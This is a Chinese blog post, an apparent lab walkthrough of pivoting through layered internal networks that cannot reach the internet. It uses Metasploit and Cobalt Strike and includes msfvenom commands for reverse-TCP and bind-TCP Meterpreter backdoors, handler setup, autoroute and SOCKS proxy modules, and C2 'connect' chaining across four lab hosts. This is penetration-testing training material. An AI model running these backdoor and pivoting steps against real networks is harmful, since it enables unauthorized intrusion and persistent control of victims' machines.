<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="F4tty" />
  <meta name="description" content="" />
  
  
  <title>
    
      多层内网不出网Socks代理通讯上线 
      
      
      |
    
     F4tty
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/img/favicon.ico">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.2.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/img/avatar.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">F4tty</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">主页</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">归档</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">分类</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">标签</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">友链</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">关于我</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">多层内网不出网Socks代理通讯上线</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2022-09-17 00:00:00
        </span>
        
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="分类"></i>
                
                <span class="span--category">
                  <a href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" title="内网安全">
                    <b>#</b> 内网安全
                  </a>
                </span>
                
              </span>
          
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/%E5%86%85%E7%BD%91/" title="内网">
                    #内网
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="多层内网不出网Socks代理通讯上线"><a href="#多层内网不出网Socks代理通讯上线" class="headerlink" title="多层内网不出网Socks代理通讯上线"></a>多层内网不出网Socks代理通讯上线</h1><h2 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h2><p>在内网渗透中会遇到众多内网机器不出网的情况,对渗透工作造成阻碍，这就需要代理技术来进一步对内网机器进行控制，通过内网中一台出网主机为节点对其他不出网主机建立通讯，从而达到被控。本文以MSF和CS两个主流工具进行测试</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p><img src="/posts/c4250965/LLc4qeTwaCOdzdGYloBkCQ.png" alt="LLc4qeTwaCOdzdGYloBkCQ"></p>
<p>VMware添加网卡<br><img src="/posts/c4250965/image-20220917101457747.png" alt="image-20220917101457747"><br>Win7<br><img src="/posts/c4250965/image-20220917102725290.png" alt="image-20220917102725290"><br>Win10<br><img src="/posts/c4250965/image-20220917102609833.png" alt="image-20220917102609833"><br>Server2008<br><img src="/posts/c4250965/image-20220917111247738.png" alt="image-20220917111247738"><br>Server2012<br><img src="/posts/c4250965/image-20220917111349341.png" alt="image-20220917111349341"><br>整个环境只有Win7可以出网其他主机均不能访问外网<br>搭建完成后在各系统下安装一个web界面方便测试<br>为了方便所有后门都通过vmtools拉到虚拟机 实战环境要测试如何传马</p>
<p>**背景介绍:**现在已经控制Win7需要进一步向下渗透，常规思路可以将工具上传到win7然后一层一层向下渗透，但是实际环境下工具太大，被杀，需要安装等问题都会阻拦继续向下渗透，可以以win7为节点实现攻击机向win10通讯，其他主机思路相同</p>
<p>Win7拿shell<br>msf</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msfvenom - p windows/metmsfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=3333 -f exe &gt; xd.exe</span><br><span class="line">msfconsole</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_tcp</span><br><span class="line">set lhost 0.0.0.0</span><br><span class="line">set lport 4444</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p>运行后门上线<br>cs直接生成后门运行上线<br>由于后面的主机不出网我们的攻击机无法建立通讯，所以应该想办法建立通讯才可以继续后面的操作</p>
<h2 id="Win10通讯-amp-上线"><a href="#Win10通讯-amp-上线" class="headerlink" title="Win10通讯&amp;上线"></a>Win10通讯&amp;上线</h2><h3 id="MSF通讯"><a href="#MSF通讯" class="headerlink" title="MSF通讯"></a>MSF通讯</h3><p>1、添加路由</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -p #查看当前路由</span><br><span class="line">run post/multi/manage/autoroute </span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">添加指定路由，1是接收的session编号 一般使用上方命令即可</span></span><br><span class="line">route add 192.168.11.0 255.255.255.0 1</span><br></pre></td></tr></table></figure>

<p><img src="/posts/c4250965/image-20220917153408096.png" alt="image-20220917153408096"><br><img src="/posts/c4250965/image-20220917153614689.png" alt="image-20220917153614689"><br>现在就有了内网段的路由<br>但是这只实现了msf可以和内网实现通讯，其他工具并不能建立连接，还需要使用sock来进一步建立连接</p>
<p>2、Sock代理<br><img src="/posts/c4250965/image-20220917154311496.png" alt="image-20220917154311496"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">先将win7会话置于后台</span></span><br><span class="line">background</span><br><span class="line">use auxiliary/server/socks_proxy</span><br><span class="line">set srvhost 0.0.0.0</span><br><span class="line">set srvport 1122</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="/posts/c4250965/image-20220917154550252.png" alt="image-20220917154550252"></p>
<p>启用代理软件配置Sock5代理<br>这里使用浏览器插件Proxy SwitchyOmega<br><img src="/posts/c4250965/image-20220917160200742.png" alt="image-20220917160200742"><br>添加完成后选择使用代理访问内网地址 192.168.11.129<br><img src="/posts/c4250965/image-20220917155232079.png" alt="image-20220917155232079"><br>成功访问<br>也可以使用其他代理工具:SocksCap Proxifier ProxyChains等</p>
<h3 id="CS通讯"><a href="#CS通讯" class="headerlink" title="CS通讯"></a>CS通讯</h3><p><img src="/posts/c4250965/image-20220917161138881.png" alt="image-20220917161138881"><br><img src="/posts/c4250965/image-20220917161213025.png" alt="image-20220917161213025"><br>注意CS的代理协议为cocks4a<br><img src="/posts/c4250965/image-20220917163512573.png" alt="image-20220917163512573"><br><img src="/posts/c4250965/image-20220917163546627.png" alt="image-20220917163546627"><br>访问成功</p>
<h3 id="CS上线"><a href="#CS上线" class="headerlink" title="CS上线"></a>CS上线</h3><p>目前为止成功与win10建立通讯接下来要想办法将win10上线 因为win10没有办法出网所以采用正向连接的方法进行上线<br>上传一个127.0.0.1 9090的木马将流量指向本地9090端口,然后我们去连接9090端口<br><img src="/posts/c4250965/image-20220917190253795.png" alt="image-20220917190253795"><br>生成该监听器的木马<br><img src="/posts/c4250965/image-20220917172159222.png" alt="image-20220917172159222"><br>win10运行该木马<br>CS命令行–win7会话交互</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">connect 192.168.11.129 9090</span><br></pre></td></tr></table></figure>

<p><img src="/posts/c4250965/image-20220917190235166.png" alt="image-20220917190235166"></p>
<p>成功上线</p>
<h3 id="MSF上线"><a href="#MSF上线" class="headerlink" title="MSF上线"></a>MSF上线</h3><p>思路和CS上线相同依旧是正向连接</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">后门生成</span></span><br><span class="line">msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe &gt; bd.exe</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">监听</span></span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/bind_tcp</span><br><span class="line">set rhost 192.168.11.129</span><br><span class="line">set lport 3333</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>win10运行后门</p>
<p><img src="/posts/c4250965/image-20220917191306644.png" alt="image-20220917191306644"></p>
<p>上线成功</p>
<h2 id="Server2008通讯-amp-上线"><a href="#Server2008通讯-amp-上线" class="headerlink" title="Server2008通讯&amp;上线"></a>Server2008通讯&amp;上线</h2><p>前面已经拿到Win10的shell了那么后面主机的通讯问题解决方案也和上面相同</p>
<h3 id="CS通讯-amp-上线"><a href="#CS通讯-amp-上线" class="headerlink" title="CS通讯&amp;上线"></a>CS通讯&amp;上线</h3><p>既然已经拿到win10已经上线了那么可以直接使用socks代理<br><img src="/posts/c4250965/image-20220917192353737.png" alt="image-20220917192353737"><br><img src="/posts/c4250965/image-20220917192601813.png" alt="image-20220917192601813"><br><img src="/posts/c4250965/image-20220917192607786.png" alt="image-20220917192607786"><br>成功通讯，上线操作也和上文相同 直接把上文生成的马传到server2008运行执行connect命令即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">connect 192.168.22.131 9090</span><br></pre></td></tr></table></figure>

<p><img src="/posts/c4250965/image-20220917193416637.png" alt="image-20220917193416637"></p>
<p><img src="/posts/c4250965/image-20220917193255443.png" alt="image-20220917193255443"></p>
<h3 id="MSF通讯-amp-上线"><a href="#MSF通讯-amp-上线" class="headerlink" title="MSF通讯&amp;上线"></a>MSF通讯&amp;上线</h3><p>来到win10的shell添加路由</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -p</span><br><span class="line">run post/multi/manage/autoroute</span><br></pre></td></tr></table></figure>

<p><img src="/posts/c4250965/image-20220917194155018.png" alt="image-20220917194155018"></p>
<p>建立socks代理</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/server/socks_proxy</span><br><span class="line">set srvhost 0.0.0.0</span><br><span class="line">set srvport 2244</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="/posts/c4250965/image-20220917194355153.png" alt="image-20220917194355153"></p>
<p>接下来上线思路和上文相同直接用上文的马,只需改监听器目标即可</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/bind_tcp</span><br><span class="line">set rhost 192.168.22.131</span><br><span class="line">set lport 3333</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="/posts/c4250965/image-20220917194646969.png" alt="image-20220917194646969"></p>
<h2 id="Server2012通讯-amp-上线"><a href="#Server2012通讯-amp-上线" class="headerlink" title="Server2012通讯&amp;上线"></a>Server2012通讯&amp;上线</h2><h3 id="CS通讯-amp-上线-1"><a href="#CS通讯-amp-上线-1" class="headerlink" title="CS通讯&amp;上线"></a>CS通讯&amp;上线</h3><p>思路依旧<br><img src="/posts/c4250965/image-20220917195540934.png" alt="image-20220917195540934"><br><img src="/posts/c4250965/image-20220917200019135.png" alt="image-20220917200019135"></p>
<p>建立通讯完成<br>传马 connect命令<br><img src="/posts/c4250965/image-20220917200153974.png" alt="image-20220917200153974"><br>成功上线</p>
<h3 id="MSF通讯-amp-上线-1"><a href="#MSF通讯-amp-上线-1" class="headerlink" title="MSF通讯&amp;上线"></a>MSF通讯&amp;上线</h3><p>一样的思路<br>server2008添加路由</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -p</span><br><span class="line">run post/multi/manage/autoroute</span><br></pre></td></tr></table></figure>

<p><img src="/posts/c4250965/image-20220917200328474.png" alt="image-20220917200328474"></p>
<p>建立socks</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/server/socks_proxy</span><br><span class="line">set srvhost 0.0.0.0</span><br><span class="line">set srvport 2233</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="/posts/c4250965/image-20220917200615556.png" alt="image-20220917200615556"></p>
<p>传马改监听器</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/bind_tcp</span><br><span class="line">set rhost 192.168.33.130</span><br><span class="line">set lport 3333</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="/posts/c4250965/image-20220917200817033.png" alt="image-20220917200817033"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>借助socks代理技术可以实现对不出网设备进行通讯和上线，CS和msf俩个工具能用CS就用CS操作方便很多，本文环境主要联系代理实现通讯以及上线，实战环境中比这复杂的多，会有防火墙等设备进行拦截，并且能否传马都需要根据环境进行判断，如果防火墙对tcp流量进行了拦截那么就要用到隧道技术</p>
<p><img src="/posts/c4250965/image-20220917201341746.png" alt="image-20220917201341746"></p>
<p><img src="/posts/c4250965/image-20220917201310403.png" alt="image-20220917201310403"></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/posts/a5e10218/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2022-09-17 00:00:00
            </span>
            
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="分类"></i>
                    
                    <span class="span--category">
                      <a href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" title="内网安全">
                        <b>#</b> 内网安全
                      </a>
                    </span>
                    
                  </span>
              
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/%E5%86%85%E7%BD%91/" title="内网">
                        #内网
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/posts/59813d6f/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%A4%9A%E5%B1%82%E5%86%85%E7%BD%91%E4%B8%8D%E5%87%BA%E7%BD%91Socks%E4%BB%A3%E7%90%86%E9%80%9A%E8%AE%AF%E4%B8%8A%E7%BA%BF"><span class="toc-text">多层内网不出网Socks代理通讯上线</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%99%E5%9C%A8%E5%89%8D%E9%9D%A2"><span class="toc-text">写在前面</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Win10%E9%80%9A%E8%AE%AF-amp-%E4%B8%8A%E7%BA%BF"><span class="toc-text">Win10通讯&amp;上线</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MSF%E9%80%9A%E8%AE%AF"><span class="toc-text">MSF通讯</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CS%E9%80%9A%E8%AE%AF"><span class="toc-text">CS通讯</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CS%E4%B8%8A%E7%BA%BF"><span class="toc-text">CS上线</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MSF%E4%B8%8A%E7%BA%BF"><span class="toc-text">MSF上线</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Server2008%E9%80%9A%E8%AE%AF-amp-%E4%B8%8A%E7%BA%BF"><span class="toc-text">Server2008通讯&amp;上线</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CS%E9%80%9A%E8%AE%AF-amp-%E4%B8%8A%E7%BA%BF"><span class="toc-text">CS通讯&amp;上线</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MSF%E9%80%9A%E8%AE%AF-amp-%E4%B8%8A%E7%BA%BF"><span class="toc-text">MSF通讯&amp;上线</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Server2012%E9%80%9A%E8%AE%AF-amp-%E4%B8%8A%E7%BA%BF"><span class="toc-text">Server2012通讯&amp;上线</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CS%E9%80%9A%E8%AE%AF-amp-%E4%B8%8A%E7%BA%BF-1"><span class="toc-text">CS通讯&amp;上线</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MSF%E9%80%9A%E8%AE%AF-amp-%E4%B8%8A%E7%BA%BF-1"><span class="toc-text">MSF通讯&amp;上线</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2023 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E5%A4%9A%E5%B1%82%E5%86%85%E7%BD%91%E4%B8%8D%E5%87%BA%E7%BD%91Socks%E4%BB%A3%E7%90%86%E9%80%9A%E8%AE%AF%E4%B8%8A%E7%BA%BF + '&url=' + http%3A%2F%2Fexample.com%2Fposts%2Fc4250965%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/posts/c4250965/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
